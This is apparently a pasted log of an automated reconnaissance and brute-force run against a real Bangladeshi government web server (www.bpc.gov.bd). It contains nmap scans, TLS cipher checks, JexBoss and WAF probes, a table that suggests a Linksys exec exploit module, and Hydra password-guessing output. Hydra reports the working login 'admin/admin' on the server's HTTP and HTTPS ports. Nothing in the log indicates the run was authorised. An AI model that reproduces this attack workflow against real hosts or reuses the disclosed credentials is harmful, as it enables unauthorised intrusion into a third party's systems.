  1501. DH-DSS-DES-CBC3-SHA timeout - timed out
  1502. DH-DSS-DES-CBC-SHA timeout - timed out
  1503. DES-CBC3-SHA timeout - timed out
  1504. DES-CBC-SHA timeout - timed out
  1505. AECDH-NULL-SHA timeout - timed out
  1506. AECDH-DES-CBC3-SHA timeout - timed out
  1507. ADH-DES-CBC3-SHA timeout - timed out
  1508. ADH-DES-CBC-SHA timeout - timed out
  1509.  
  1510.  
  1511.  
  1512. SCAN COMPLETED IN 58.03 S
  1513. -------------------------
  1514. #######################################################################################################################################
  1515.  
  1516.  
  1517. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  1518. | * And others Java Deserialization Vulnerabilities * |
  1519. | |
  1520. | @author: João Filho Matos Figueiredo |
  1521. | @contact: joaomatosf@gmail.com |
  1522. | |
  1523. | @update: https://github.com/joaomatosf/jexboss |
  1524. #______________________________________________________#
  1525.  
  1526. @version: 1.2.4
  1527.  
  1528. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  1529.  
  1530.  
  1531. ** Checking Host: https://www.bpc.gov.bd:8443 **
  1532.  
  1533. [*] Checking admin-console: [ OK ]
  1534. [*] Checking Struts2: [ OK ]
  1535. [*] Checking Servlet Deserialization: [ OK ]
  1536. [*] Checking Application Deserialization: [ OK ]
  1537. [*] Checking Jenkins: [ OK ]
  1538. [*] Checking web-console: [ OK ]
  1539. [*] Checking jmx-console: [ OK ]
  1540. [*] Checking JMXInvokerServlet: [ OK ]
  1541.  
  1542.  
  1543. * Results:
  1544. The server is not vulnerable to bugs tested ... :D
  1545.  
  1546. * Info: review, suggestions, updates, etc:
  1547. https://github.com/joaomatosf/jexboss
  1548.  
  1551.  
  1552. ######################################################################################################################################
  1553.  
  1554. I, [2018-11-23T00:42:52.764399 #18378] INFO -- : Initiating port scan
  1555. I, [2018-11-23T00:43:53.632428 #18378] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-42-52.xml
  1556. I, [2018-11-23T00:43:53.633772 #18378] INFO -- : Discovered open port: 173.237.136.21:80
  1557. I, [2018-11-23T00:43:54.601472 #18378] INFO -- : Discovered open port: 173.237.136.21:443
  1558. I, [2018-11-23T00:43:56.407608 #18378] INFO -- : Discovered open port: 173.237.136.21:465
  1559. I, [2018-11-23T00:43:57.796636 #18378] INFO -- : Discovered open port: 173.237.136.21:993
  1560. I, [2018-11-23T00:44:00.018622 #18378] INFO -- : Discovered open port: 173.237.136.21:995
  1561. I, [2018-11-23T00:44:02.253780 #18378] INFO -- : Discovered open port: 173.237.136.21:8443
  1562. I, [2018-11-23T00:44:04.043590 #18378] INFO -- : <<<Enumerating vulnerable applications>>>
  1563.  
  1564.  
  1565. --------------------------------------------------------
  1566. <<<Yasuo discovered following vulnerable applications>>>
  1567. --------------------------------------------------------
  1568. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
  1569. | App Name | URL to Application | Potential Exploit | Username | Password |
  1570. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
  1571. | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  1572. | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  1573. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
  1574. ######################################################################################################################################
  1575. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:48 EST
  1576. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
  1577. Host is up (0.20s latency).
  1578. Not shown: 16 closed ports, 1 filtered port
  1579. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1580. PORT STATE SERVICE
  1581. 21/tcp open ftp
  1582. 22/tcp open ssh
  1583. 53/tcp open domain
  1584. 80/tcp open http
  1585. 110/tcp open pop3
  1586. 443/tcp open https
  1587. 993/tcp open imaps
  1588. 3306/tcp open mysql
  1589. 8080/tcp open http-proxy
  1590. #######################################################################################################################################
  1591. [STATUS] 5.53 tries/min, 210 tries in 00:38h, 18 to do in 00:04h, 1 active
  1592. 1 of 1 target completed, 0 valid passwords found
  1593. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:09
  1594. + -- --=[Port 22 opened... running tests...
  1595. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1596.  
  1597. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:09
  1598. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
  1599. [DATA] attacking ssh://www.bpc.gov.bd:22/
  1600. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1601.  
  1602. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
  1603. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1604. [DATA] attacking ssh://www.bpc.gov.bd:22/
  1605. + -- --=[Port 23 closed... skipping.
  1606. + -- --=[Port 25 closed... skipping.
  1607. + -- --=[Port 80 opened... running tests...
  1608. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1609.  
  1610. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
  1611. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1612. [DATA] attacking http-get://www.bpc.gov.bd:80//
  1613. [80][http-get] host: www.bpc.gov.bd login: admin password: admin
  1614. [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
  1615. 1 of 1 target successfully completed, 1 valid password found
  1616. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:14
  1617. + -- --=[Port 110 opened... running tests...
  1618. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1619.  
  1620. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1621.  
  1622. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:28:23
  1623. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  1624. [DATA] attacking http-gets://www.bpc.gov.bd:443//
  1625. [443][http-get] host: www.bpc.gov.bd login: admin password: admin
  1626. [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
  1627. 1 of 1 target successfully completed, 1 valid password found
  1628. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:28:27
  1629. + -- --=[Port 445 closed... skipping.
  1630. + -- --=[Port 512 closed... skipping.
  1631. + -- --=[Port 513 closed... skipping.
  1632. + -- --=[Port 514 closed... skipping.
  1633. + -- --=[Port 993 opened... running tests...
  1634. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1635.  
  1636. 1 of 1 target completed, 0 valid passwords found
  1637. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:18:43
  1638. + -- --=[Port 1433 closed... skipping.
  1639. + -- --=[Port 1521 closed... skipping.
  1640. + -- --=[Port 3306 opened... running tests...
  1641. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1642.  
  1643. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:18:43
  1644. [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
  1645. [DATA] attacking mysql://www.bpc.gov.bd:3306/
  1646. [STATUS] 49.00 tries/min, 49 tries in 00:01h, 29 to do in 00:01h, 1 active
  1647. 1 of 1 target completed, 0 valid passwords found
  1648. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:19:45
  1649. + -- --=[Port 3389 closed... skipping.
  1650. + -- --=[Port 5432 closed... skipping.
  1651. + -- --=[Port 5900 closed... skipping.
  1652. + -- --=[Port 5901 closed... skipping.
  1653. + -- --=[Port 8000 closed... skipping.
  1654. + -- --=[Port 8080 opened... running tests...
  1655. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  1656.  
  1657. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:19:45
  1658. + -- --=[Port 8100 closed... skipping.
  1659. + -- --=[Port 6667 closed... skipping.
  1660. #######################################################################################################################################
  1661. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:50 EST
  1662. Nmap scan report for 173.237.136.21
  1663. Host is up (0.22s latency).
  1664. Not shown: 459 closed ports, 3 filtered ports
  1665. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1666. PORT STATE SERVICE
  1667. 21/tcp open ftp
  1668. 22/tcp open ssh
  1669. 53/tcp open domain
  1670. 80/tcp open http
  1671. 110/tcp open pop3
  1672. 143/tcp open imap
  1673. 443/tcp open https
  1674. 465/tcp open smtps
  1675. 587/tcp open submission
  1676. 993/tcp open imaps
  1677. 995/tcp open pop3s
  1678. 3306/tcp open mysql
  1679. 8080/tcp open http-proxy
  1680. 8443/tcp open https-alt
  1681. #######################################################################################################################################
  1682. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
  1683. Nmap scan report for 173.237.136.21
  1684. Host is up (0.20s latency).
  1685. Not shown: 11 closed ports, 2 filtered ports
  1686. PORT STATE SERVICE
  1687. 53/udp open domain
  1688.  
  1689. Nmap done: 1 IP address (1 host up) scanned in 23.12 seconds
  1690. ######################################################################################################################################
  1691. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
  1692. Nmap scan report for 173.237.136.21
  1693. Host is up (0.22s latency).
  1694.  
  1695. PORT STATE SERVICE VERSION
  1696. 21/tcp open ftp Pure-FTPd
  1697. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1698. Device type: WAP
  1699. Running: Linux 2.4.X|2.6.X
  1700. OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
  1701. OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
  1702. Network Distance: 12 hops
  1703.  
  1704. TRACEROUTE (using port 21/tcp)
  1705. HOP RTT ADDRESS
  1706. 1 102.94 ms 10.251.200.1
  1707. 2 103.36 ms 185.94.189.129
  1708. 3 104.94 ms 185.206.226.109
  1709. 4 105.12 ms 213.248.70.225
  1710. 5 218.06 ms prs-bb4-link.telia.net (62.115.138.138)
  1711. 6 222.38 ms 80.91.251.243
  1712. 7 204.20 ms atl-b22-link.telia.net (62.115.125.191)
  1713. 8 217.44 ms 80.91.246.75
  1714. 9 222.00 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  1715. 10 217.75 ms 207.210.229.6
  1716. 11 219.03 ms 174.136.31.214
  1717. 12 ... 30
  1718. ######################################################################################################################################
  1719. # general
  1720. (gen) banner: SSH-2.0-OpenSSH_5.3
  1721. (gen) software: OpenSSH 5.3
  1722. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
  1723. (gen) compression: enabled (zlib@openssh.com)
  1724.  
  1725. # key exchange algorithms
  1726. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  1727. `- [info] available since OpenSSH 4.4
  1728.  
  1729. # host-key algorithms
  1730. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  1731. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  1732. `- [warn] using small 1024-bit modulus
  1733. `- [warn] using weak random number generator could reveal the key
  1734. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1735.  
  1736. # encryption algorithms (ciphers)
  1737. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1738. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  1739. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1740.  
  1741. # message authentication code algorithms
  1742. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  1743. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1744. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  1745. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1746. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1747. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1748. `- [warn] using encrypt-and-MAC mode
  1749. `- [info] available since OpenSSH 2.5.0
  1750. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1751. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1752. `- [warn] using encrypt-and-MAC mode
  1753. `- [info] available since OpenSSH 2.1.0
  1754.  
  1755. # algorithm recommendations (for OpenSSH 5.3)
  1756. (rec) -ssh-dss -- key algorithm to remove
  1757. (rec) -hmac-ripemd160 -- mac algorithm to remove
  1758. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  1759. #######################################################################################################################################
  1760. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:02 EST
  1761. Nmap scan report for 173.237.136.21
  1762. Host is up (0.22s latency).
  1763.  
  1764. PORT STATE SERVICE VERSION
  1765. 22/tcp closed ssh
  1766. Too many fingerprints match this host to give specific OS details
  1767. Network Distance: 12 hops
  1768.  
  1769. TRACEROUTE (using port 22/tcp)
  1770. HOP RTT ADDRESS
  1771. 1 103.33 ms 10.251.200.1
  1772. 2 110.54 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  1773. 3 103.47 ms 185.206.226.109
  1774. 4 103.50 ms 213.248.70.225
  1775. 5 219.92 ms prs-bb3-link.telia.net (62.115.138.132)
  1776. 6 220.92 ms 80.91.251.243
  1777. 7 203.39 ms atl-b22-link.telia.net (62.115.125.191)
  1778. 8 219.92 ms 80.91.246.75
  1779. 9 220.49 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  1780. 10 220.48 ms 207.210.229.6
  1781. 11 219.97 ms 174.136.31.218
  1782. 12 220.15 ms 173.237.136.21
  1783. #######################################################################################################################################
  1784. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:03 EST
  1785. Nmap scan report for 173.237.136.21
  1786. Host is up (0.22s latency).
  1787.  
  1788. PORT STATE SERVICE VERSION
  1789. 53/tcp open domain?
  1790. |_dns-fuzz: Server didn't response to our probe, can't fuzz
  1791. |_dns-nsec-enum: Can't determine domain for host 173.237.136.21; use dns-nsec-enum.domains script arg.
  1792. |_dns-nsec3-enum: Can't determine domain for host 173.237.136.21; use dns-nsec3-enum.domains script arg.
  1793. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1794. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 4.4 (93%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.2 - 4.9 (90%)
  1795. No exact OS matches for host (test conditions non-ideal).
  1796. Network Distance: 12 hops
  1797.  
  1798. Host script results:
  1799. | dns-blacklist:
  1800. | SPAM
  1801. |_ list.quorum.to - FAIL
  1802. |_dns-brute: Can't guess domain of "173.237.136.21"; use dns-brute.domain script argument.
  1803.  
  1804. TRACEROUTE (using port 53/tcp)
  1805. HOP RTT ADDRESS
  1806. 1 103.29 ms 10.251.200.1
  1807. 2 103.35 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  1808. 3 105.73 ms 185.206.226.109
  1809. 4 105.76 ms 213.248.70.225
  1810. 5 222.25 ms prs-bb3-link.telia.net (62.115.138.132)
  1811. 6 223.23 ms 80.91.251.243
  1812. 7 201.37 ms atl-b22-link.telia.net (62.115.125.128)
  1813. 8 222.03 ms 80.91.246.75
  1814. 9 218.83 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  1815. 10 218.58 ms 207.210.229.6
  1816. 11 218.27 ms 174.136.31.218
  1817. 12 218.56 ms 173.237.136.21
  1818. #######################################################################################################################################
  1826.  
  1827. WAFW00F - Web Application Firewall Detection Tool
  1828.  
  1829. By Sandro Gauci && Wendel G. Henrique
  1830.  
  1831. Checking http://173.237.136.21
  1832. Generic Detection results:
  1833. No WAF detected by the generic detection
  1834. Number of requests: 14
  1835. #######################################################################################################################################
  1836. http://173.237.136.21 [200 OK] Country[UNITED STATES][US], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel
  1837. http://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, IP[173.237.136.21], Title[Default Web Site Page]
  1838. #######################################################################################################################################
  1839.  
  1840. wig - WebApp Information Gatherer
  1841.  
  1842.  
  1843. Scanning http://173.237.136.21...
  1844. ___________________ SITE INFO ___________________
  1845. IP Title
  1846. 173.237.136.21
  1847.  
  1848. ____________________ VERSION ____________________
  1849. Name Versions Type
  1850. PHP 5.6.35 Platform
  1851.  
  1852. __________________ INTERESTING __________________
  1853. URL Note Type
  1854. /phpinfo.php PHP info file Interesting
  1855.  
  1856. _________________________________________________
  1857. Time: 1.1 sec Urls: 598 Fingerprints: 40401
  1858. #######################################################################################################################################
  1859. HTTP/1.1 200 OK
  1860. Date: Fri, 23 Nov 2018 05:05:29 GMT
  1861. Content-Type: text/html
  1862. Last-Modified: Thu, 20 Oct 2016 16:22:47 GMT
  1863. Content-Encoding: gzip
  1864. Connection: keep-alive
  1865. #######################################################################################################################################
  1866. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:05 EST
  1867. Nmap scan report for 173.237.136.21
  1868. Host is up (0.13s latency).
  1869.  
  1870. PORT STATE SERVICE VERSION
  1871. 110/tcp open pop3 Dovecot pop3d
  1872. | pop3-brute:
  1873. | Accounts: No valid accounts found
  1874. |_ Statistics: Performed 205 guesses in 181 seconds, average tps: 1.0
  1875. |_pop3-capabilities: USER PIPELINING UIDL CAPA STLS AUTH-RESP-CODE TOP RESP-CODES SASL(PLAIN LOGIN)
  1876. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1877. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
  1878. No exact OS matches for host (test conditions non-ideal).
  1879. Network Distance: 1 hop
  1880.  
  1881. TRACEROUTE (using port 80/tcp)
  1882. HOP RTT ADDRESS
  1883. 1 106.31 ms 173.237.136.21
  1884. #######################################################################################################################################
  1885.  
  1893.  
  1894. WAFW00F - Web Application Firewall Detection Tool
  1895.  
  1896. By Sandro Gauci && Wendel G. Henrique
  1897.  
  1898. Checking https://173.237.136.21
  1899. Generic Detection results:
  1900. No WAF detected by the generic detection
  1901. Number of requests: 14
  1902. #######################################################################################################################################
  1903. https://173.237.136.21 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
  1904. https://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
  1905. #######################################################################################################################################
  1906.  
  1907.  
  1908. AVAILABLE PLUGINS
  1909. -----------------
  1910.  
  1911. PluginHSTS
  1912. PluginOpenSSLCipherSuites
  1913. PluginSessionResumption
  1914. PluginSessionRenegotiation
  1915. PluginChromeSha1Deprecation
  1916. PluginCertInfo
  1917. PluginHeartbleed
  1918. PluginCompression
  1919.  
  1920.  
  1921.  
  1922. CHECKING HOST(S) AVAILABILITY
  1923. -----------------------------
  1924.  
  1925. 173.237.136.21:443 => 173.237.136.21:443
  1926.  
  1927.  
  1928.  
  1929. SCAN RESULTS FOR 173.237.136.21:443 - 173.237.136.21:443
  1930. --------------------------------------------------------
  1931.  
  1932. * Deflate Compression:
  1933. OK - Compression disabled
  1934.  
  1935. * Session Renegotiation:
  1936. Client-initiated Renegotiations: OK - Rejected
  1937. Secure Renegotiation: OK - Supported
  1938.  
  1939. * Certificate - Content:
  1940. SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
  1941. Common Name: *.myserverhosts.com
  1942. Issuer: COMODO RSA Domain Validation Secure Server CA
  1943. Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
  1944. Not Before: Jun 8 00:00:00 2018 GMT
  1945. Not After: Jun 8 23:59:59 2020 GMT
  1946. Signature Algorithm: sha256WithRSAEncryption
  1947. Public Key Algorithm: rsaEncryption
  1948. Key Size: 2048 bit
  1949. Exponent: 65537 (0x10001)
  1950. X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
  1951.  
  1952. * Certificate - Trust:
  1953. Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
  1954. Google CA Store (09/2015): OK - Certificate is trusted
  1955. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1956. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1957. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1958. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1959. Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  1960.  
  1961. * Certificate - OCSP Stapling:
  1962. NOT SUPPORTED - Server did not send back an OCSP response.
  1963.  
  1964. * Session Resumption:
  1965. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1966. With TLS Session Tickets: OK - Supported
  1967.  
  1968. * SSLV2 Cipher Suites:
  1969. Server rejected all cipher suites.
  1970.  
  1971. * SSLV3 Cipher Suites:
  1972. Undefined - An unexpected error happened:
  1973. PSK-3DES-EDE-CBC-SHA timeout - timed out
  1974. EXP-RC2-CBC-MD5 timeout - timed out
  1975. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  1976. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  1977. EXP-DES-CBC-SHA timeout - timed out
  1978. EXP-ADH-RC4-MD5 timeout - timed out
  1979. EXP-ADH-DES-CBC-SHA timeout - timed out
  1980. EDH-RSA-DES-CBC-SHA timeout - timed out
  1981. EDH-DSS-DES-CBC-SHA timeout - timed out
  1982. ECDHE-RSA-NULL-SHA timeout - timed out
  1983. ECDHE-ECDSA-NULL-SHA timeout - timed out
  1984. ECDH-ECDSA-NULL-SHA timeout - timed out
  1985. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
  1986. DH-RSA-DES-CBC-SHA timeout - timed out
  1987. DH-DSS-DES-CBC-SHA timeout - timed out
  1988. DES-CBC3-SHA timeout - timed out
  1989. DES-CBC-SHA timeout - timed out
  1990. AECDH-NULL-SHA timeout - timed out
  1991. AECDH-DES-CBC3-SHA timeout - timed out
  1992. ADH-DES-CBC3-SHA timeout - timed out
  1993. ADH-DES-CBC-SHA timeout - timed out
  1994.  
  1995.  
  1996.  
  1997. SCAN COMPLETED IN 51.14 S
  1998. -------------------------
  1999. Version: 1.11.12-static
  2000. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2001.  
  2002. Connected to 173.237.136.21
  2003.  
  2004. Testing SSL server 173.237.136.21 on port 443 using SNI name 173.237.136.21
  2005.  
  2006. TLS Fallback SCSV:
  2007. Server supports TLS Fallback SCSV
  2008.  
  2009. TLS renegotiation:
  2010. Secure session renegotiation supported
  2011.  
  2012. TLS Compression:
  2013. Compression disabled
  2014.  
  2015. Heartbleed:
  2016. TLS 1.2 not vulnerable to heartbleed
  2017. TLS 1.1 not vulnerable to heartbleed
  2018. TLS 1.0 not vulnerable to heartbleed
  2019.  
  2020. Supported Server Cipher(s):
  2021. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2022. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  2023. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2024. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  2025. Accepted TLSv1.2 256 bits AES256-SHA256
  2026. Accepted TLSv1.2 256 bits AES256-SHA
  2027. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2028. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  2029. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2030. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  2031. Accepted TLSv1.2 128 bits AES128-SHA256
  2032. Accepted TLSv1.2 128 bits AES128-SHA
  2033. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2034. Accepted TLSv1.2 112 bits DES-CBC3-SHA
  2035. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2036. Accepted TLSv1.1 256 bits AES256-SHA
  2037. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2038. Accepted TLSv1.1 128 bits AES128-SHA
  2039. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2040. Accepted TLSv1.1 112 bits DES-CBC3-SHA
  2041. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2042. Accepted TLSv1.0 256 bits AES256-SHA
  2043. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2044. Accepted TLSv1.0 128 bits AES128-SHA
  2045. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2046. Accepted TLSv1.0 112 bits DES-CBC3-SHA
  2047.  
  2048. SSL Certificate:
  2049. Signature Algorithm: sha256WithRSAEncryption
  2050. RSA Key Strength: 2048
  2051.  
  2052. Subject: *.myserverhosts.com
  2053. Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
  2054. Issuer: COMODO RSA Domain Validation Secure Server CA
  2055.  
  2056. Not valid before: Jun 8 00:00:00 2018 GMT
  2057. Not valid after: Jun 8 23:59:59 2020 GMT
  2058.  
  2059. + -- --=[Port 8080 opened... running tests...
  2060.  
  2068.  
  2069. WAFW00F - Web Application Firewall Detection Tool
  2070.  
  2071. By Sandro Gauci && Wendel G. Henrique
  2072.  
  2073. Checking http://173.237.136.21:8080
  2074. Generic Detection results:
  2075. No WAF detected by the generic detection
  2076. Number of requests: 14
  2077.  
  2078. http://173.237.136.21:8080 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
  2079. http://173.237.136.21:8080/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
  2080.  
  2081. Version: 1.11.12-static
  2082. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2083.  
  2084. Connected to 173.237.136.21
  2085.  
  2086. Testing SSL server 173.237.136.21 on port 8080 using SNI name 173.237.136.21
  2087.  
  2088. TLS Fallback SCSV:
  2089. Server does not support TLS Fallback SCSV
  2090.  
  2091. TLS renegotiation:
  2092. Session renegotiation not supported
  2093.  
  2094. TLS Compression:
  2095. Compression disabled
  2096.  
  2097. Heartbleed:
  2098. TLS 1.2 not vulnerable to heartbleed
  2099. TLS 1.1 not vulnerable to heartbleed
  2100. TLS 1.0 not vulnerable to heartbleed
  2101. #######################################################################################################################################
  2102.  
  2103.  
  2104.  
  2113.  
  2114. @version: 1.2.4
  2115.  
  2116. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2117.  
  2118.  
  2119. ** Checking Host: http://173.237.136.21:8080 **
  2120.  
  2121. [*] Checking admin-console: [ OK ]
  2122. [*] Checking Struts2: [ OK ]
  2123. [*] Checking Servlet Deserialization: [ OK ]
  2124. [*] Checking Application Deserialization: [ OK ]
  2125. [*] Checking Jenkins: [ OK ]
  2126. [*] Checking web-console: [ OK ]
  2127. [*] Checking jmx-console: [ OK ]
  2128. [*] Checking JMXInvokerServlet: [ OK ]
  2129.  
  2130.  
  2131. * Results:
  2132. The server is not vulnerable to bugs tested ... :D
  2133.  
  2134. * Info: review, suggestions, updates, etc:
  2135. https://github.com/joaomatosf/jexboss
  2136.  
  2139.  
  2140. + -- --=[Port 8180 closed... skipping.
  2141. + -- --=[Port 8443 opened... running tests...
  2142.  
  2150.  
  2151. WAFW00F - Web Application Firewall Detection Tool
  2152.  
  2153. By Sandro Gauci && Wendel G. Henrique
  2154.  
  2155. Checking http://173.237.136.21:8443
  2156. Generic Detection results:
  2157. No WAF detected by the generic detection
  2158. Number of requests: 14
  2159.  
